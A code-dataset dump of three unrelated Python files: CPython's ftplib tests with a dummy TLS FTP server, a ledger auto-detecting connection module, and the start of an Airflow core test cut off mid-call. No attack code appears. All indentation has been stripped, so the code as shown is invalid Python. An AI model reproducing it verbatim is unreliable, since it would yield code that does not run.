socket = context.wrap_socket(self.socket,
suppress_ragged_eofs=False,
server_side=True,
do_handshake_on_connect=False)
self.del_channel()
self.set_socket(socket)
self._ssl_accepting = True
def _do_ssl_handshake(self):
try:
self.socket.do_handshake()
except ssl.SSLError as err:
if err.args[0] in (ssl.SSL_ERROR_WANT_READ,
ssl.SSL_ERROR_WANT_WRITE):
return
elif err.args[0] == ssl.SSL_ERROR_EOF:
return self.handle_close()
raise
except OSError as err:
if err.args[0] == errno.ECONNABORTED:
return self.handle_close()
else:
self._ssl_accepting = False
def _do_ssl_shutdown(self):
self._ssl_closing = True
try:
self.socket = self.socket.unwrap()
except ssl.SSLError as err:
if err.args[0] in (ssl.SSL_ERROR_WANT_READ,
ssl.SSL_ERROR_WANT_WRITE):
return
except OSError as err:
# Any "socket error" corresponds to a SSL_ERROR_SYSCALL return
# from OpenSSL's SSL_shutdown(), corresponding to a
# closed socket condition. See also:
# http://www.mail-archive.com/openssl-users@openssl.org/msg60710.html
pass
self._ssl_closing = False
if getattr(self, '_ccc', False) is False:
super(SSLConnection, self).close()
else:
pass
def handle_read_event(self):
if self._ssl_accepting:
self._do_ssl_handshake()
elif self._ssl_closing:
self._do_ssl_shutdown()
else:
super(SSLConnection, self).handle_read_event()
def handle_write_event(self):
if self._ssl_accepting:
self._do_ssl_handshake()
elif self._ssl_closing:
self._do_ssl_shutdown()
else:
super(SSLConnection, self).handle_write_event()
def send(self, data):
try:
return super(SSLConnection, self).send(data)
except ssl.SSLError as err:
if err.args[0] in (ssl.SSL_ERROR_EOF, ssl.SSL_ERROR_ZERO_RETURN,
ssl.SSL_ERROR_WANT_READ,
ssl.SSL_ERROR_WANT_WRITE):
return 0
raise
def recv(self, buffer_size):
try:
return super(SSLConnection, self).recv(buffer_size)
except ssl.SSLError as err:
if err.args[0] in (ssl.SSL_ERROR_WANT_READ,
ssl.SSL_ERROR_WANT_WRITE):
return b''
if err.args[0] in (ssl.SSL_ERROR_EOF, ssl.SSL_ERROR_ZERO_RETURN):
self.handle_close()
return b''
raise
def handle_error(self):
raise Exception
def close(self):
if (isinstance(self.socket, ssl.SSLSocket) and
self.socket._sslobj is not None):
self._do_ssl_shutdown()
else:
super(SSLConnection, self).close()
class DummyTLS_DTPHandler(SSLConnection, DummyDTPHandler):
"""A DummyDTPHandler subclass supporting TLS/SSL."""
def __init__(self, conn, baseclass):
DummyDTPHandler.__init__(self, conn, baseclass)
if self.baseclass.secure_data_channel:
self.secure_connection()
class DummyTLS_FTPHandler(SSLConnection, DummyFTPHandler):
"""A DummyFTPHandler subclass supporting TLS/SSL."""
dtp_handler = DummyTLS_DTPHandler
def __init__(self, conn):
DummyFTPHandler.__init__(self, conn)
self.secure_data_channel = False
self._ccc = False
def cmd_auth(self, line):
"""Set up secure control channel."""
self.push('234 AUTH TLS successful')
self.secure_connection()
def cmd_ccc(self, line):
self.push('220 Reverting back to clear-text')
self._ccc = True
self._do_ssl_shutdown()
def cmd_pbsz(self, line):
"""Negotiate size of buffer for secure data transfer.
For TLS/SSL the only valid value for the parameter is '0'.
Any other value is accepted but ignored.
"""
self.push('200 PBSZ=0 successful.')
def cmd_prot(self, line):
"""Setup un/secure data channel."""
arg = line.upper()
if arg == 'C':
self.push('200 Protection set to Clear')
self.secure_data_channel = False
elif arg == 'P':
self.push('200 Protection set to Private')
self.secure_data_channel = True
else:
self.push("502 Unrecognized PROT type (use C or P).")
class DummyTLS_FTPServer(DummyFTPServer):
handler = DummyTLS_FTPHandler
class TestFTPClass(TestCase):
def setUp(self):
self.server = DummyFTPServer((HOST, 0))
self.server.start()
self.client = ftplib.FTP(timeout=TIMEOUT)
self.client.connect(self.server.host, self.server.port)
def tearDown(self):
self.client.close()
self.server.stop()
asyncore.close_all(ignore_all=True)
def check_data(self, received, expected):
self.assertEqual(len(received), len(expected))
self.assertEqual(received, expected)
def test_getwelcome(self):
self.assertEqual(self.client.getwelcome(), '220 welcome')
def test_sanitize(self):
self.assertEqual(self.client.sanitize('foo'), repr('foo'))
self.assertEqual(self.client.sanitize('pass 12345'), repr('pass *****'))
self.assertEqual(self.client.sanitize('PASS 12345'), repr('PASS *****'))
def test_exceptions(self):
self.assertRaises(ftplib.error_temp, self.client.sendcmd, 'echo 400')
self.assertRaises(ftplib.error_temp, self.client.sendcmd, 'echo 499')
self.assertRaises(ftplib.error_perm, self.client.sendcmd, 'echo 500')
self.assertRaises(ftplib.error_perm, self.client.sendcmd, 'echo 599')
self.assertRaises(ftplib.error_proto, self.client.sendcmd, 'echo 999')
def test_all_errors(self):
exceptions = (ftplib.error_reply, ftplib.error_temp, ftplib.error_perm,
ftplib.error_proto, ftplib.Error, OSError, EOFError)
for x in exceptions:
try:
raise x('exception not included in all_errors set')
except ftplib.all_errors:
pass
def test_set_pasv(self):
# passive mode is supposed to be enabled by default
self.assertTrue(self.client.passiveserver)
self.client.set_pasv(True)
self.assertTrue(self.client.passiveserver)
self.client.set_pasv(False)
self.assertFalse(self.client.passiveserver)
def test_voidcmd(self):
self.client.voidcmd('echo 200')
self.client.voidcmd('echo 299')
self.assertRaises(ftplib.error_reply, self.client.voidcmd, 'echo 199')
self.assertRaises(ftplib.error_reply, self.client.voidcmd, 'echo 300')
def test_login(self):
self.client.login()
def test_acct(self):
self.client.acct('passwd')
def test_rename(self):
self.client.rename('a', 'b')
self.server.handler_instance.next_response = '200'
self.assertRaises(ftplib.error_reply, self.client.rename, 'a', 'b')
def test_delete(self):
self.client.delete('foo')
self.server.handler_instance.next_response = '199'
self.assertRaises(ftplib.error_reply, self.client.delete, 'foo')
def test_size(self):
self.client.size('foo')
def test_mkd(self):
dir = self.client.mkd('/foo')
self.assertEqual(dir, '/foo')
def test_rmd(self):
self.client.rmd('foo')
def test_cwd(self):
dir = self.client.cwd('/foo')
self.assertEqual(dir, '250 cwd ok')
def test_pwd(self):
dir = self.client.pwd()
self.assertEqual(dir, 'pwd ok')
def test_quit(self):
self.assertEqual(self.client.quit(), '221 quit ok')
# Ensure the connection gets closed; sock attribute should be None
self.assertEqual(self.client.sock, None)
def test_abort(self):
self.client.abort()
def test_retrbinary(self):
def callback(data):
received.append(data.decode('ascii'))
received = []
self.client.retrbinary('retr', callback)
self.check_data(''.join(received), RETR_DATA)
def test_retrbinary_rest(self):
def callback(data):
received.append(data.decode('ascii'))
for rest in (0, 10, 20):
received = []
self.client.retrbinary('retr', callback, rest=rest)
self.check_data(''.join(received), RETR_DATA[rest:])
def test_retrlines(self):
received = []
self.client.retrlines('retr', received.append)
self.check_data(''.join(received), RETR_DATA.replace('\r\n', ''))
def test_storbinary(self):
f = io.BytesIO(RETR_DATA.encode('ascii'))
self.client.storbinary('stor', f)
self.check_data(self.server.handler_instance.last_received_data, RETR_DATA)
# test new callback arg
flag = []
f.seek(0)
self.client.storbinary('stor', f, callback=lambda x: flag.append(None))
self.assertTrue(flag)
def test_storbinary_rest(self):
f = io.BytesIO(RETR_DATA.replace('\r\n', '\n').encode('ascii'))
for r in (30, '30'):
f.seek(0)
self.client.storbinary('stor', f, rest=r)
self.assertEqual(self.server.handler_instance.rest, str(r))
def test_storlines(self):
f = io.BytesIO(RETR_DATA.replace('\r\n', '\n').encode('ascii'))
self.client.storlines('stor', f)
self.check_data(self.server.handler_instance.last_received_data, RETR_DATA)
# test new callback arg
flag = []
f.seek(0)
self.client.storlines('stor foo', f, callback=lambda x: flag.append(None))
self.assertTrue(flag)
f = io.StringIO(RETR_DATA.replace('\r\n', '\n'))
# storlines() expects a binary file, not a text file
with support.check_warnings(('', BytesWarning), quiet=True):
self.assertRaises(TypeError, self.client.storlines, 'stor foo', f)
def test_nlst(self):
self.client.nlst()
self.assertEqual(self.client.nlst(), NLST_DATA.split('\r\n')[:-1])
def test_dir(self):
l = []
self.client.dir(lambda x: l.append(x))
self.assertEqual(''.join(l), LIST_DATA.replace('\r\n', ''))
def test_mlsd(self):
list(self.client.mlsd())
list(self.client.mlsd(path='/'))
list(self.client.mlsd(path='/', facts=['size', 'type']))
ls = list(self.client.mlsd())
for name, facts in ls:
self.assertIsInstance(name, str)
self.assertIsInstance(facts, dict)
self.assertTrue(name)
self.assertIn('type', facts)
self.assertIn('perm', facts)
self.assertIn('unique', facts)
def set_data(data):
self.server.handler_instance.next_data = data
def test_entry(line, type=None, perm=None, unique=None, name=None):
type = 'type' if type is None else type
perm = 'perm' if perm is None else perm
unique = 'unique' if unique is None else unique
name = 'name' if name is None else name
set_data(line)
_name, facts = next(self.client.mlsd())
self.assertEqual(_name, name)
self.assertEqual(facts['type'], type)
self.assertEqual(facts['perm'], perm)
self.assertEqual(facts['unique'], unique)
# plain
test_entry('type=type;perm=perm;unique=unique; name\r\n')
# "=" in fact value
test_entry('type=ty=pe;perm=perm;unique=unique; name\r\n', type="ty=pe")
test_entry('type==type;perm=perm;unique=unique; name\r\n', type="=type")
test_entry('type=t=y=pe;perm=perm;unique=unique; name\r\n', type="t=y=pe")
test_entry('type=====;perm=perm;unique=unique; name\r\n', type="====")
# spaces in name
test_entry('type=type;perm=perm;unique=unique; na me\r\n', name="na me")
test_entry('type=type;perm=perm;unique=unique; name \r\n', name="name ")
test_entry('type=type;perm=perm;unique=unique; name\r\n', name=" name")
test_entry('type=type;perm=perm;unique=unique; n am e\r\n', name="n am e")
# ";" in name
test_entry('type=type;perm=perm;unique=unique; na;me\r\n', name="na;me")
test_entry('type=type;perm=perm;unique=unique; ;name\r\n', name=";name")
test_entry('type=type;perm=perm;unique=unique; ;name;\r\n', name=";name;")
test_entry('type=type;perm=perm;unique=unique; ;;;;\r\n', name=";;;;")
# case sensitiveness
set_data('Type=type;TyPe=perm;UNIQUE=unique; name\r\n')
_name, facts = next(self.client.mlsd())
for x in facts:
self.assertTrue(x.islower())
# no data (directory empty)
set_data('')
self.assertRaises(StopIteration, next, self.client.mlsd())
set_data('')
for x in self.client.mlsd():
self.fail("unexpected data %s" % x)
def test_makeport(self):
with self.client.makeport():
# IPv4 is in use, just make sure send_eprt has not been used
self.assertEqual(self.server.handler_instance.last_received_cmd,
'port')
def test_makepasv(self):
host, port = self.client.makepasv()
conn = socket.create_connection((host, port), timeout=TIMEOUT)
conn.close()
# IPv4 is in use, just make sure send_epsv has not been used
self.assertEqual(self.server.handler_instance.last_received_cmd, 'pasv')
def test_with_statement(self):
self.client.quit()
def is_client_connected():
if self.client.sock is None:
return False
try:
self.client.sendcmd('noop')
except (OSError, EOFError):
return False
return True
# base test
with ftplib.FTP(timeout=TIMEOUT) as self.client:
self.client.connect(self.server.host, self.server.port)
self.client.sendcmd('noop')
self.assertTrue(is_client_connected())
self.assertEqual(self.server.handler_instance.last_received_cmd, 'quit')
self.assertFalse(is_client_connected())
# QUIT sent inside the with block
with ftplib.FTP(timeout=TIMEOUT) as self.client:
self.client.connect(self.server.host, self.server.port)
self.client.sendcmd('noop')
self.client.quit()
self.assertEqual(self.server.handler_instance.last_received_cmd, 'quit')
self.assertFalse(is_client_connected())
# force a wrong response code to be sent on QUIT: error_perm
# is expected and the connection is supposed to be closed
try:
with ftplib.FTP(timeout=TIMEOUT) as self.client:
self.client.connect(self.server.host, self.server.port)
self.client.sendcmd('noop')
self.server.handler_instance.next_response = '550 error on quit'
except ftplib.error_perm as err:
self.assertEqual(str(err), '550 error on quit')
else:
self.fail('Exception not raised')
# needed to give the threaded server some time to set the attribute
# which otherwise would still be == 'noop'
time.sleep(0.1)
self.assertEqual(self.server.handler_instance.last_received_cmd, 'quit')
self.assertFalse(is_client_connected())
def test_source_address(self):
self.client.quit()
port = support.find_unused_port()
try:
self.client.connect(self.server.host, self.server.port,
source_address=(HOST, port))
self.assertEqual(self.client.sock.getsockname()[1], port)
self.client.quit()
except OSError as e:
if e.errno == errno.EADDRINUSE:
self.skipTest("couldn't bind to port %d" % port)
raise
def test_source_address_passive_connection(self):
port = support.find_unused_port()
self.client.source_address = (HOST, port)
try:
with self.client.transfercmd('list') as sock:
self.assertEqual(sock.getsockname()[1], port)
except OSError as e:
if e.errno == errno.EADDRINUSE:
self.skipTest("couldn't bind to port %d" % port)
raise
def test_parse257(self):
self.assertEqual(ftplib.parse257('257 "/foo/bar"'), '/foo/bar')
self.assertEqual(ftplib.parse257('257 "/foo/bar" created'), '/foo/bar')
self.assertEqual(ftplib.parse257('257 ""'), '')
self.assertEqual(ftplib.parse257('257 "" created'), '')
self.assertRaises(ftplib.error_reply, ftplib.parse257, '250 "/foo/bar"')
# The 257 response is supposed to include the directory
# name and in case it contains embedded double-quotes
# they must be doubled (see RFC-959, chapter 7, appendix 2).
self.assertEqual(ftplib.parse257('257 "/foo/b""ar"'), '/foo/b"ar')
self.assertEqual(ftplib.parse257('257 "/foo/b""ar" created'), '/foo/b"ar')
def test_line_too_long(self):
self.assertRaises(ftplib.Error, self.client.sendcmd,
'x' * self.client.maxline * 2)
def test_retrlines_too_long(self):
self.client.sendcmd('SETLONGRETR %d' % (self.client.maxline * 2))
received = []
self.assertRaises(ftplib.Error,
self.client.retrlines, 'retr', received.append)
def test_storlines_too_long(self):
f = io.BytesIO(b'x' * self.client.maxline * 2)
self.assertRaises(ftplib.Error, self.client.storlines, 'stor', f)
@skipUnless(support.IPV6_ENABLED, "IPv6 not enabled")
class TestIPv6Environment(TestCase):
def setUp(self):
self.server = DummyFTPServer((HOSTv6, 0), af=socket.AF_INET6)
self.server.start()
self.client = ftplib.FTP(timeout=TIMEOUT)
self.client.connect(self.server.host, self.server.port)
def tearDown(self):
self.client.close()
self.server.stop()
asyncore.close_all(ignore_all=True)
def test_af(self):
self.assertEqual(self.client.af, socket.AF_INET6)
def test_makeport(self):
with self.client.makeport():
self.assertEqual(self.server.handler_instance.last_received_cmd,
'eprt')
def test_makepasv(self):
host, port = self.client.makepasv()
conn = socket.create_connection((host, port), timeout=TIMEOUT)
conn.close()
self.assertEqual(self.server.handler_instance.last_received_cmd, 'epsv')
def test_transfer(self):
def retr():
def callback(data):
received.append(data.decode('ascii'))
received = []
self.client.retrbinary('retr', callback)
self.assertEqual(len(''.join(received)), len(RETR_DATA))
self.assertEqual(''.join(received), RETR_DATA)
self.client.set_pasv(True)
retr()
self.client.set_pasv(False)
retr()
@skipUnless(ssl, "SSL not available")
class TestTLS_FTPClassMixin(TestFTPClass):
"""Repeat TestFTPClass tests starting the TLS layer for both control
and data connections first.
"""
def setUp(self):
self.server = DummyTLS_FTPServer((HOST, 0))
self.server.start()
self.client = ftplib.FTP_TLS(timeout=TIMEOUT)
self.client.connect(self.server.host, self.server.port)
# enable TLS
self.client.auth()
self.client.prot_p()
@skipUnless(ssl, "SSL not available")
class TestTLS_FTPClass(TestCase):
"""Specific TLS_FTP class tests."""
def setUp(self):
self.server = DummyTLS_FTPServer((HOST, 0))
self.server.start()
self.client = ftplib.FTP_TLS(timeout=TIMEOUT)
self.client.connect(self.server.host, self.server.port)
def tearDown(self):
self.client.close()
self.server.stop()
asyncore.close_all(ignore_all=True)
def test_control_connection(self):
self.assertNotIsInstance(self.client.sock, ssl.SSLSocket)
self.client.auth()
self.assertIsInstance(self.client.sock, ssl.SSLSocket)
def test_data_connection(self):
# clear text
with self.client.transfercmd('list') as sock:
self.assertNotIsInstance(sock, ssl.SSLSocket)
self.assertEqual(self.client.voidresp(), "226 transfer complete")
# secured, after PROT P
self.client.prot_p()
with self.client.transfercmd('list') as sock:
self.assertIsInstance(sock, ssl.SSLSocket)
self.assertEqual(self.client.voidresp(), "226 transfer complete")
# PROT C is issued, the connection must be in cleartext again
self.client.prot_c()
with self.client.transfercmd('list') as sock:
self.assertNotIsInstance(sock, ssl.SSLSocket)
self.assertEqual(self.client.voidresp(), "226 transfer complete")
def test_login(self):
# login() is supposed to implicitly secure the control connection
self.assertNotIsInstance(self.client.sock, ssl.SSLSocket)
self.client.login()
self.assertIsInstance(self.client.sock, ssl.SSLSocket)
# make sure that AUTH TLS doesn't get issued again
self.client.login()
def test_auth_issued_twice(self):
self.client.auth()
self.assertRaises(ValueError, self.client.auth)
def test_auth_ssl(self):
try:
self.client.ssl_version = ssl.PROTOCOL_SSLv23
self.client.auth()
self.assertRaises(ValueError, self.client.auth)
finally:
self.client.ssl_version = ssl.PROTOCOL_TLSv1
def test_context(self):
self.client.quit()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
self.assertRaises(ValueError, ftplib.FTP_TLS, keyfile=CERTFILE,
context=ctx)
self.assertRaises(ValueError, ftplib.FTP_TLS, certfile=CERTFILE,
context=ctx)
self.assertRaises(ValueError, ftplib.FTP_TLS, certfile=CERTFILE,
keyfile=CERTFILE, context=ctx)
self.client = ftplib.FTP_TLS(context=ctx, timeout=TIMEOUT)
self.client.connect(self.server.host, self.server.port)
self.assertNotIsInstance(self.client.sock, ssl.SSLSocket)
self.client.auth()
self.assertIs(self.client.sock.context, ctx)
self.assertIsInstance(self.client.sock, ssl.SSLSocket)
self.client.prot_p()
with self.client.transfercmd('list') as sock:
self.assertIs(sock.context, ctx)
self.assertIsInstance(sock, ssl.SSLSocket)
def test_ccc(self):
self.assertRaises(ValueError, self.client.ccc)
self.client.login(secure=True)
self.assertIsInstance(self.client.sock, ssl.SSLSocket)
self.client.ccc()
self.assertRaises(ValueError, self.client.sock.unwrap)
def test_check_hostname(self):
self.client.quit()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.check_hostname = True
ctx.load_verify_locations(CAFILE)
self.client = ftplib.FTP_TLS(context=ctx, timeout=TIMEOUT)
# 127.0.0.1 doesn't match SAN
self.client.connect(self.server.host, self.server.port)
with self.assertRaises(ssl.CertificateError):
self.client.auth()
# exception quits connection
self.client.connect(self.server.host, self.server.port)
self.client.prot_p()
with self.assertRaises(ssl.CertificateError):
with self.client.transfercmd("list") as sock:
pass
self.client.quit()
self.client.connect("localhost", self.server.port)
self.client.auth()
self.client.quit()
self.client.connect("localhost", self.server.port)
self.client.prot_p()
with self.client.transfercmd("list") as sock:
pass
class TestTimeouts(TestCase):
def setUp(self):
self.evt = threading.Event()
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sock.settimeout(20)
self.port = support.bind_port(self.sock)
self.server_thread = threading.Thread(target=self.server)
self.server_thread.start()
# Wait for the server to be ready.
self.evt.wait()
self.evt.clear()
self.old_port = ftplib.FTP.port
ftplib.FTP.port = self.port
def tearDown(self):
ftplib.FTP.port = self.old_port
self.server_thread.join()
def server(self):
# This method sets the evt 3 times:
# 1) when the connection is ready to be accepted.
# 2) when it is safe for the caller to close the connection
# 3) when we have closed the socket
self.sock.listen()
# (1) Signal the caller that we are ready to accept the connection.
self.evt.set()
try:
conn, addr = self.sock.accept()
except socket.timeout:
pass
else:
conn.sendall(b"1 Hola mundo\n")
conn.shutdown(socket.SHUT_WR)
# (2) Signal the caller that it is safe to close the socket.
self.evt.set()
conn.close()
finally:
self.sock.close()
def testTimeoutDefault(self):
# default -- use global socket timeout
self.assertIsNone(socket.getdefaulttimeout())
socket.setdefaulttimeout(30)
try:
ftp = ftplib.FTP(HOST)
finally:
socket.setdefaulttimeout(None)
self.assertEqual(ftp.sock.gettimeout(), 30)
self.evt.wait()
ftp.close()
def testTimeoutNone(self):
# no timeout -- do not use global socket timeout
self.assertIsNone(socket.getdefaulttimeout())
socket.setdefaulttimeout(30)
try:
ftp = ftplib.FTP(HOST, timeout=None)
finally:
socket.setdefaulttimeout(None)
self.assertIsNone(ftp.sock.gettimeout())
self.evt.wait()
ftp.close()
def testTimeoutValue(self):
# a value
ftp = ftplib.FTP(HOST, timeout=30)
self.assertEqual(ftp.sock.gettimeout(), 30)
self.evt.wait()
ftp.close()
def testTimeoutConnect(self):
ftp = ftplib.FTP()
ftp.connect(HOST, timeout=30)
self.assertEqual(ftp.sock.gettimeout(), 30)
self.evt.wait()
ftp.close()
def testTimeoutDifferentOrder(self):
ftp = ftplib.FTP(timeout=30)
ftp.connect(HOST)
self.assertEqual(ftp.sock.gettimeout(), 30)
self.evt.wait()
ftp.close()
def testTimeoutDirectAccess(self):
ftp = ftplib.FTP()
ftp.timeout = 30
ftp.connect(HOST)
self.assertEqual(ftp.sock.gettimeout(), 30)
self.evt.wait()
ftp.close()
class MiscTestCase(TestCase):
def test__all__(self):
blacklist = {'MSG_OOB', 'FTP_PORT', 'MAXLINE', 'CRLF', 'B_CRLF',
'Error', 'parse150', 'parse227', 'parse229', 'parse257',
'print_line', 'ftpcp', 'test'}
support.check__all__(self, ftplib, blacklist=blacklist)
def test_main():
tests = [TestFTPClass, TestTimeouts,
TestIPv6Environment,
TestTLS_FTPClassMixin, TestTLS_FTPClass,
MiscTestCase]
thread_info = support.threading_setup()
try:
support.run_unittest(*tests)
finally:
support.threading_cleanup(*thread_info)
if __name__ == '__main__':
test_main()
|
autodetect.py
|
# Copyright (c) 2017-2021 Digital Asset (Switzerland) GmbH and/or its affiliates. All rights reserved.
# SPDX-License-Identifier: Apache-2.0
from datetime import datetime
from functools import partial
from threading import Event, RLock, Thread
from typing import TYPE_CHECKING, Dict, Iterable, Optional, Union
from .. import LOG
from ..prim import Party
from ..scheduler import Invoker
from ._base import LedgerClient, LedgerConnectionOptions, LedgerNetwork
from .errors import ConnectionTimeoutError, UserTerminateRequest
from .oauth import oauth_flow
from .v1.grpc import GRPCv1Connection
if TYPE_CHECKING:
from ..client._conn_settings import HTTPConnectionSettings
from ..client.ledger import LedgerMetadata
__all__ = ["AutodetectLedgerNetwork", "AutodetectConnection"]
class AutodetectLedgerNetwork(LedgerNetwork):
"""
Auto-detecting pool implementation that automatically routes to the correct pool
implementation based on the scheme specified in the URL.
"""
def __init__(self, invoker: "Invoker", options: "LedgerConnectionOptions"):
self._invoker = invoker
self._options = options
self._closed = False
self._first_connection_evt = Event()
self._first_connection = None # type: Optional[AutodetectConnection]
self._connections = dict() # type: Dict[HTTPConnectionSettings, AutodetectConnection]
self._lock = RLock()
self._ledger_future = self._invoker.create_future()
self._main_thread = Thread(target=self._main, daemon=True)
self._main_thread.start()
async def ledger(self) -> "LedgerMetadata":
return await self._ledger_future
async def connect_anonymous(
self, settings: "HTTPConnectionSettings", context_path: "Optional[str]"
) -> None:
"""
Establish a single no-Party connection (but only if no other connections have already been
established). This is used by specialized setups that do not require Parties to be supplied
for any reason (such as fetching initial ledger metadata).
"""
self._get_connection(settings, context_path)
await self.ledger()
async def connect(
self,
party: "Union[str, Party]",
settings: "HTTPConnectionSettings",
context_path: "Optional[str]" = None,
) -> LedgerClient:
LOG.info("Establishing a connection to %s on party %s...", settings, party)
if settings.oauth:
new_oauth_settings = await oauth_flow(settings.oauth)
settings = settings._replace(oauth=new_oauth_settings)
conn = self._get_connection(settings, context_path)
ledger = await self.ledger()
if ledger.protocol_version == "v1":
from .v1.grpc import GRPCv1LedgerClient
return GRPCv1LedgerClient(conn, ledger, Party(party))
elif ledger.protocol_version == "v0":
raise RuntimeError(f"Unsupported protocol version: {ledger.protocol_version}")
else:
raise RuntimeError(f"Unknown protocol version: {ledger.protocol_version}")
async def upload_package(self, dar_contents: bytes) -> None:
connection = self._first_connection
if connection is None:
raise RuntimeError("cannot upload a package until a connection has been established")
from .v1.grpc import grpc_upload_package
await self._invoker.run_in_executor(partial(grpc_upload_package, connection, dar_contents))
async def set_time(self, new_time: datetime) -> None:
connection = self._first_connection
if connection is None:
raise RuntimeError("cannot upload a package until a connection has been established")
from .v1.grpc import grpc_set_time
ledger = await self.ledger()
return await self._invoker.run_in_executor(
partial(grpc_set_time, connection, ledger.ledger_id, new_time)
)
async def close(self) -> None:
with self._lock:
connections = list(self._connections.values())
self._connections.clear()
for connection in connections:
try:
connection.close()
except:
LOG.exception("Had trouble closing a connection.")
def _close_all(self) -> None:
LOG.debug("Closing all connections...")
try:
with self._lock:
connections = list(self._connections.values())
self._connections.clear()
for connection in connections:
# noinspection PyBroadException
try:
connection.close()
except Exception: # noqa
LOG.exception("Had trouble closing a connection.")
finally:
LOG.debug("Marked the connection pool as closed.")
self._closed = True
@property
def closed(self):
return self._closed
def _get_connection(
self, settings: "HTTPConnectionSettings", context_path: "Optional[str]"
) -> "AutodetectConnection":
if not self._lock.acquire(timeout=5):
raise TimeoutError("Could not acquire an internal lock quickly enough.")
try:
if self._closed:
raise IOError("LedgerNetwork.close() has already been called")
if not self._connections:
LOG.debug("Initializing the first connection to %s...", settings)
self._first_connection = AutodetectConnection(
self._invoker, self._options, settings, context_path
)
self._connections[settings] = self._first_connection
self._first_connection_evt.set()
return self._first_connection
else:
LOG.debug("Initializing a connection to %s...", settings)
stub = self._connections.get(settings)
if stub is None:
stub = AutodetectConnection(
self._invoker, self._options, settings, context_path
)
self._connections[settings] = stub
return stub
except: # noqa
LOG.exception("An error occurred trying to create a connection.")
raise
finally:
self._lock.release()
def _main(self) -> None:
timeout = self._options.connect_timeout
try:
LOG.debug(
"Waiting for the first connection to be established (timeout: %s)...", timeout
)
if not self._first_connection_evt.wait(
timeout=timeout.total_seconds() if timeout is not None else None
):
LOG.error(
"Waited %s for the first connection but it never came. Aborting...", timeout
)
raise Exception("first connection timeout")
LOG.debug("Starting ledger detection.")
conn = self._first_connection
if conn is not None:
for i, metadata in enumerate(_monitor_ledger_network(conn)):
if i == 0:
self._invoker.run_in_loop(lambda: self._ledger_future.set_result(metadata))
elif metadata is not None:
LOG.warning("The network monitor thread emitted multiple metadata!")
except (UserTerminateRequest, ConnectionTimeoutError) as ex:
# re-raise these, but they are "known" errors so a stack trace in the logs would just
# create clutter
self._invoker.run_in_loop(lambda: self._ledger_future.set_exception(ex))
except Exception as ex:
# unexpected exception raised, so provide lots of information that might help debug
LOG.exception("The main monitoring thread died.")
def _maybe_apply_error():
if not self._ledger_future.done():
LOG.error("The above error was propagated as an initialization error.")
self._ledger_future.set_exception(ex)
# if we haven't even been able to initialize, propagate this error to the init future
self._invoker.run_in_loop(_maybe_apply_error)
finally:
self._close_all()
class AutodetectConnection(GRPCv1Connection):
pass
def _monitor_ledger_network(connection: "AutodetectConnection") -> "Iterable[LedgerMetadata]":
"""
Monitor the very first connection established and provide general information about
the ledger to other parties.
"""
from .v1.grpc import grpc_detect_ledger_id
ledger_id = grpc_detect_ledger_id(connection)
if ledger_id is not None:
LOG.info("Ledger ID: %s", ledger_id)
from .v1.grpc import grpc_main_thread
return grpc_main_thread(connection=connection, ledger_id=ledger_id)
elif connection.settings.scheme in ("grpc", "grpcs"):
raise Exception("The protocol was specified as gRPC, but the backend does not support it.")
else:
LOG.error("Couldn't connect over gRPC.")
raise Exception("Connection to the v0 REST API is no longer supported.")
|
test_core.py
|
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import multiprocessing
import os
import signal
import unittest
from datetime import timedelta
from time import sleep
from dateutil.relativedelta import relativedelta
from numpy.testing import assert_array_almost_equal
from airflow import settings
from airflow.exceptions import AirflowException, AirflowTaskTimeout
from airflow.hooks.base_hook import BaseHook
from airflow.jobs.local_task_job import LocalTaskJob
from airflow.models import DagBag, DagRun, TaskFail, TaskInstance
from airflow.models.baseoperator import BaseOperator
from airflow.models.dag import DAG
from airflow.operators.bash import BashOperator
from airflow.operators.check_operator import CheckOperator, ValueCheckOperator
from airflow.operators.dummy_operator import DummyOperator
from airflow.operators.python import PythonOperator
from airflow.settings import Session
from airflow.utils.dates import infer_time_unit, round_time, scale_time_units
from airflow.utils.state import State
from airflow.utils.timezone import datetime
from airflow.utils.types import DagRunType
from tests.test_utils.config import conf_vars
DEV_NULL = '/dev/null'
DEFAULT_DATE = datetime(2015, 1, 1)
TEST_DAG_ID = 'unit_tests'
class OperatorSubclass(BaseOperator):
"""
An operator to test template substitution
"""
template_fields = ['some_templated_field']
def __init__(self, some_templated_field, *args, **kwargs):
super().__init__(*args, **kwargs)
self.some_templated_field = some_templated_field
def execute(self, context):
pass
class TestCore(unittest.TestCase):
default_scheduler_args = {"num_runs": 1}
def setUp(self):
self.dagbag = DagBag(
dag_folder=DEV_NULL, include_examples=True)
self.args = {'owner': 'airflow', 'start_date': DEFAULT_DATE}
self.dag = DAG(TEST_DAG_ID, default_args=self.args)
self.dag_bash = self.dagbag.dags['example_bash_operator']
self.runme_0 = self.dag_bash.get_task('runme_0')
self.run_after_loop = self.dag_bash.get_task('run_after_loop')
self.run_this_last = self.dag_bash.get_task('run_this_last')
def tearDown(self):
session = Session()
session.query(DagRun).filter(
DagRun.dag_id == TEST_DAG_ID).delete(
synchronize_session=False)
session.query(TaskInstance).filter(
TaskInstance.dag_id == TEST_DAG_ID).delete(
synchronize_session=False)
session.query(TaskFail).filter(
TaskFail.dag_id == TEST_DAG_ID).delete(
synchronize_session=False)
session.commit()
session.close()
def test_check_operators(self):
conn_id = "sqlite_default"
captain_hook = BaseHook.get_hook(conn_id=conn_id) # quite funny :D
captain_hook.run("CREATE TABLE operator_test_table (a, b)")
captain_hook.run("insert into operator_test_table values (1,2)")
op = CheckOperator(
task_id='check',
sql="select count(*) from operator_test_table",
conn_id=conn_id,
dag=self.dag)
op.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
op = ValueCheckOperator(
task_id='value_check',
pass_value=95,
tolerance=0.1,
conn_id=conn_id,
sql="SELECT 100",
dag=self.dag)
